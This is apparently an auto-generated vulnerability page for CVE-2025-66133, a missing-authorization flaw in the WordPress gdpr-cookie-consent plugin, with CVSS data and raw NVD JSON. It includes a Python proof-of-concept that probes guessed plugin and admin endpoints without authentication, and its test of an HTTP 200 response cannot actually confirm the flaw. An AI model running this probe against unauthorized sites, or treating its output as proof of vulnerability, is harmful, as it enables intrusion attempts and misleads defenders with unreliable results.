Security Vulnerability Report
中文
CVE-2025-66133 CVSS 5.3 MEDIUM

CVE-2025-66133

Published: 2025-12-16 09:15:58
Last Modified: 2026-04-27 17:16:41

Description

Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Cookie Notice for GDPR, CCPA & ePrivacy Consent <= 4.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66133 PoC - Missing Authorization in WP Cookie Notice Plugin # Target: WordPress site with gdpr-cookie-consent plugin <= 4.0.7 TARGET_URL = "https://example.com" # Replace with target URL def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-66133 Missing Authorization vulnerability in gdpr-cookie-consent plugin """ # Common endpoints for gdpr-cookie-consent plugin endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/gdpr-cookie-consent/v1/settings", "/wp-json/gdpr-cookie-consent/v1/cookie-settings", "/wp-admin/admin.php?page=gdpr-cookie-consent" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Testing {TARGET_URL} for CVE-2025-66133") for endpoint in endpoints: url = TARGET_URL + endpoint try: # Try to access admin functionality without authentication response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Possible vulnerable endpoint found: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint {endpoint} requires authentication (Protected)") else: print(f"[*] Endpoint {endpoint} returned status: {response.status_code}") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {str(e)}") print("\n[*] Note: This is a PoC for educational purposes only.") print("[*] Always obtain proper authorization before security testing.") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66133", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:57.913", "lastModified": "2026-04-27T17:16:41.163", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}